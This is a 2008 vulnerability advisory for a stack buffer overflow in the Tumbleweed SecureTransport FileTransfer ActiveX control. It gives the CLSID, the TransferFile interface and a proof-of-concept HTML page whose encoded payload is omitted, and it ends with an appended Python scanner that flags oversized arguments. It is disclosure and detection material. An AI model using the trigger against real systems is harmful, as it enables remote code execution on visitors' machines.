Topic : Tumbleweed SecureTransport FileTransfer ActiveX Control Buffer Overflow

SecurityAlert : 3806
CVE : CVE-2008-1724
SecurityRisk : High
Remote Exploit : Yes
Local Exploit : No
Exploit Given : Yes
Credit : Patrick Webster
Published : 11.04.2008

Affected Software : Tumbleweed SecureTransport FileTransfer

Advisory Text :

aushack.com - Vulnerability Advisory
-----------------------------------------------
Release Date:
07-Apr-2008

Software:
Tumbleweed Communications - SecureTransport FileTransfer
http://www.tumbleweed.com/

Description:
"Tumbleweed SecureTransport is the industry's most secure Managed File
Transfer solution for moving financial transactions, critical business
files, large documents, XML, and EDI transactions over the Internet and
private IP networks. The SecureTransport managed file transfer suite was
built with security in mind from the ground up. SecureTransport provides
corporate and government organizations with an enterprise-class managed
file transfer service supporting a broad and flexible set of open Internet
standards. Winner of the 2006 "Best Intellectual Property Protection" award
from SC Magazine, SecureTransport securely manages file transfer at over
20,000 sites around the world.

Financial networks use SecureTransport to move billions of dollars in
financial transactions daily, and 8 of the top 10 U.S. banks use it to
serve tens of thousands of corporate customers. Healthcare providers,
payers, producers and clearing houses are linked through SecureTransport,
which provides a single, integrated secure file transfer infrastructure for
transferring private health information (PHI). And government agencies
leverage SecureTransport to share sensitive documents with other agencies."

Versions affected:
SecureTransport FileTransfer ActiveX Control vcst_eu.dll 1.0.0.5 English.
Prior versions, and other language editions (vcst_*.dll), are assumed
to be vulnerable.

Vulnerability discovered:

Buffer Overflow.

Vulnerability impact:

High - Remote code execution.

Vulnerability information:

This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of the Tumbleweed Communications SecureTransport
FileTransfer ActiveX Control. User interaction is required to exploit this
vulnerability, in that the target must visit a malicious page. It may also
be possible to embed the exploit in messages rendered by HTML-capable email
clients.

The specific flaw exists within the ActiveX control:

DLL: vcst_en.dll
CLSID: 38681fbd-d4cc-4a59-a527-b3136db711d3

interface IActiveXTransfer : IDispatch {
    [id(0x00000007), helpstring("method TransferFile")]
    HRESULT TransferFile(
        [in] VARIANT URL,
        [in] VARIANT hostName,
        [in] VARIANT localFile,
        [in] VARIANT remoteFile,
        [in] VARIANT fdxCookie,
        [in] long isSecure,
        [in] long isUpload,
        [in] int portNo,
        [in] long isAscii,
        [in] long shouldPerformMD5,
        [in] long isCheckpointRestart,
        [in] int serverPing,
        [out, retval] VARIANT* errBuffer);
};

When a large value is specified for the 'remoteFile' parameter of the
IActiveXTransfer.TransferFile() method, a stack-based buffer overflow
occurs. Exploitation can result in code execution under the context of the
current user. Other parameters, such as localFile and fdxCookie, may also
be vulnerable.

Examples:

The following HTML will execute calc.exe under Windows 2000 Professional.

<html>
<object classid="CLSID:38681fbd-d4cc-4a59-a527-b3136db711d3"
id="Vulnerable"></object>
<script language="javascript">
Vulnerable.TransferFile("a", "b", "c",
"[remoteFile argument omitted: long filler string followed by an encoded payload]",
"d", false, false, 80, false, true, true, 420)
</script>
</html>

Additionally, a Metasploit Framework Module has been written to
demonstrate the vulnerability.
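
A defensive content check for the pattern this advisory describes, as an added example that is not part of the original advisory or any vendor code: it flags pages that instantiate the control by its CLSID and pass an oversized string literal to TransferFile(). The 260-character threshold, the function names and the sample pages are assumptions; arguments built at run time are not inspected.

```python
import re

# CLSID and method name come from the advisory; MAX_ARG_LEN is an assumed threshold.
CLSID = "38681fbd-d4cc-4a59-a527-b3136db711d3"
MAX_ARG_LEN = 260
STRING_ARGS = ("URL", "hostName", "localFile", "remoteFile", "fdxCookie")
OBJECT_RE = re.compile(r"<object\b[^>]*>", re.I)
ATTR_RE = re.compile(r"""\b(classid|id)\s*=\s*["']?([^"'\s>]+)""", re.I)
# One call argument: a quoted literal (may span lines) or a bare token, then ',' or ')'.
ARG_RE = re.compile(
    r"""\s*(?:"((?:\\.|[^"\\])*)"|'((?:\\.|[^'\\])*)'|([^,()"']*))\s*([,)])""", re.S)

def control_ids(html):
    """Return the id of every <object> tag that instantiates the control."""
    ids = []
    for tag in OBJECT_RE.findall(html):
        attrs = {k.lower(): v for k, v in ATTR_RE.findall(tag)}
        if attrs.get("classid", "").lower() == "clsid:" + CLSID and "id" in attrs:
            ids.append(attrs["id"])
    return ids

def call_args(html, obj_id):
    """Yield the argument list of each <obj_id>.TransferFile(...) call (None = non-literal)."""
    for m in re.finditer(re.escape(obj_id) + r"\s*\.\s*TransferFile\s*\(", html):
        args = []
        a = ARG_RE.match(html, m.end())
        while a:
            args.append(a.group(1) if a.group(1) is not None else a.group(2))
            if a.group(4) == ")":
                break
            a = ARG_RE.match(html, a.end())
        yield args

def scan(html):
    """Return (object id, parameter name, length) for each oversized string literal."""
    findings = []
    for obj_id in control_ids(html):
        for args in call_args(html, obj_id):
            for name, value in zip(STRING_ARGS, args):
                if value is not None and len(value) > MAX_ARG_LEN:
                    findings.append((obj_id, name, len(value)))
    return findings

# Constructed sample pages: the long argument is plain filler, not a payload.
SAMPLE_SUSPICIOUS = (
    '<html><object classid="CLSID:%s"\nid="Vulnerable"></object>\n<script>\n'
    'Vulnerable.TransferFile("a", "b", "c",\n"%s",\n'
    '"d", false, false, 80, false, true, true, 420)\n</script></html>'
) % (CLSID.upper(), "A" * 3000)
SAMPLE_BENIGN = SAMPLE_SUSPICIOUS.replace("A" * 3000, "report.csv")
```
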

References:
aushack.com advisory
http://www.aushack.com/200708-tumbleweed.txt

Credit:
Patrick Webster ( patrick (at) aushack (dot) com )

Disclosure timeline:
13-Aug-2007 - Discovered during quick audit.
14-Aug-2007 - Metasploit module developed.
22-Aug-2007 - Notified vendor.
19-Oct-2007 - Vendor patch released. SecureTransport Server 4.6.1 Hotfix 20.
07-Apr-2008 - Disclosure.

EOF




